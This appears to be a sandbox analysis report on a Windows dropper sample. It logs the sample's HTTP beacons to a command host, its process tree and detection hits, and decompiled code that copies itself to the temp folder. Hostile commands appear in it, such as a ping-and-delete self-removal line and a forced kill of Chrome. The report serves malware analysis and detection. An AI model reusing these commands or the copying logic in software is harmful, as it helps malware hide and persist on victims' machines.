                                                                                                                                                                        Jan 30, 2021 14:31:45.143001080 CET527OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 53 75 55 63 39 4a 63 45 48 4e 72 7a 52 67 4a 70 6c 71 5a 6a 59 7e
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWESuUc9JcEHNrzRgJplqZjY~
                                                                                                                                                                        Jan 30, 2021 14:31:49.696033001 CET534INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:49 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:49.710333109 CET534OUTGET /info_old/r HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:50.896301031 CET542INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:50 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: c6mtnVXGhd10~0
                                                                                                                                                                        Jan 30, 2021 14:32:07.928347111 CET575OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:32:07.928493023 CET575OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 4b 2d 73 48 31 50 68 77 61 6f 5a 51 45 5f 44 50 35 7a 37 69 36 73 7e
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWK-sH1PhwaoZQE_DP5z7i6s~
                                                                                                                                                                        Jan 30, 2021 14:32:12.093523979 CET577INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:32:12 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        2192.168.2.34972334.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:31:26.687041998 CET175OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:26.687155962 CET175OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 58 35 77 43 76 4d 59 4f 63 57 34 7e
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWEIxhnVHXQfYX5wCvMYOcW4~
                                                                                                                                                                        Jan 30, 2021 14:31:32.487735033 CET228INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:32 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0
                                                                                                                                                                        Jan 30, 2021 14:31:33.553212881 CET228OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                        upgrade-insecure-requests: 1
                                                                                                                                                                        Content-Length: 81
                                                                                                                                                                        Host: c8dd8ae6dc4dc644.xyz
                                                                                                                                                                        Jan 30, 2021 14:31:33.553366899 CET228OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 78 63 59 6c 4e 37 74 37 4c 4c 4d 58 58 6d 4c 58 67 52 49 52 55 7a 75 78 7a 4a 32 53 58 66 4a 71 4f 74 46 73 4f 35 4f 69 71 57 45 49 78 68 6e 56 48 58 51 66 59 56 2d 41 76 59 4b 69 61 4d 2d 30 7e
                                                                                                                                                                        Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWEIxhnVHXQfYV-AvYKiaM-0~
                                                                                                                                                                        Jan 30, 2021 14:31:38.112478018 CET349INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:31:38 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        3192.168.2.34973934.94.64.6680C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        Jan 30, 2021 14:32:18.439049006 CET3354OUTGET /info_old/ddd HTTP/1.1
                                                                                                                                                                        Host: C8DD8AE6DC4DC644.xyz
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Jan 30, 2021 14:32:20.674977064 CET5291INHTTP/1.1 200 OK
                                                                                                                                                                        Server: nginx
                                                                                                                                                                        Date: Sat, 30 Jan 2021 13:32:20 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: c4HAoZl5GFTc~0


                                                                                                                                                                        Code Manipulations

                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        Analysis Process: fnhcdXEfus.exe PID: 5976 Parent PID: 5664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:06
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\Desktop\fnhcdXEfus.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\Desktop\fnhcdXEfus.exe'
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: msiexec.exe PID: 4084 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:10
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                        File size:59904 bytes
                                                                                                                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: msiexec.exe PID: 3492 Parent PID: 1528

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
                                                                                                                                                                        Imagebase:0x1c0000
                                                                                                                                                                        File size:59904 bytes
                                                                                                                                                                        MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: 63C4F3D9EA0CC861.exe PID: 3664 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:17
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                        • Detection: 35%, Metadefender, Browse
                                                                                                                                                                        • Detection: 83%, ReversingLabs
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: 63C4F3D9EA0CC861.exe PID: 6004 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:18
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:4453376 bytes
                                                                                                                                                                        MD5 hash:18169F98E39AE228D131AEC477C8A2E9
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        Reputation:low

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: cmd.exe PID: 5776 Parent PID: 5976

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
                                                                                                                                                                        Imagebase:0xbd0000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: conhost.exe PID: 1968 Parent PID: 5776

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: PING.EXE PID: 5748 Parent PID: 5776

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:23
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0xd00000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: 1612045890161.exe PID: 5440 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:30
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\1612045890161.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        File size:103632 bytes
                                                                                                                                                                        MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 14%, ReversingLabs
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: cmd.exe PID: 1240 Parent PID: 6004

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:31
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0x910000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: conhost.exe PID: 3924 Parent PID: 1240

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: taskkill.exe PID: 6164 Parent PID: 1240

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:32
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                        Imagebase:0xef0000
                                                                                                                                                                        File size:74752 bytes
                                                                                                                                                                        MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: cmd.exe PID: 6328 Parent PID: 6004

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: conhost.exe PID: 6336 Parent PID: 6328

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:37
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Reputation:high

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: PING.EXE PID: 6372 Parent PID: 6328

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:31:38
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: ThunderFW.exe PID: 3148 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:11
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                        Imagebase:0x2b0000
                                                                                                                                                                        File size:73160 bytes
                                                                                                                                                                        MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                                                        • Detection: 2%, ReversingLabs

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: cmd.exe PID: 412 Parent PID: 3664

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: conhost.exe PID: 5752 Parent PID: 412

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        Imagebase:0x7ff6b2800000
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Analysis Process: PING.EXE PID: 6268 Parent PID: 412

                                                                                                                                                                        General

                                                                                                                                                                        Start time:14:32:20
                                                                                                                                                                        Start date:30/01/2021
                                                                                                                                                                        Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                        Imagebase:0x1e0000
                                                                                                                                                                        File size:18944 bytes
                                                                                                                                                                        MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                        Chronological Activities

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Analysis Process: fnhcdXEfus.exe PID: 5976 Parent PID: 5664 fnhcdXEfus.exeCOMMON

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 100204C0, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                          			E100204C0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				int _t62;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E10022D01);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3"); // executed
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0); // executed
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312); // executed
							_t102 = _t56;
							_t57 = E1001A170( &_v576); // executed
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0(); // executed
						E1001FF90(_t82, _t100, _t102, __eflags, "install", "installp2", "-0.3", "45.0.0", "exe"); // executed
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
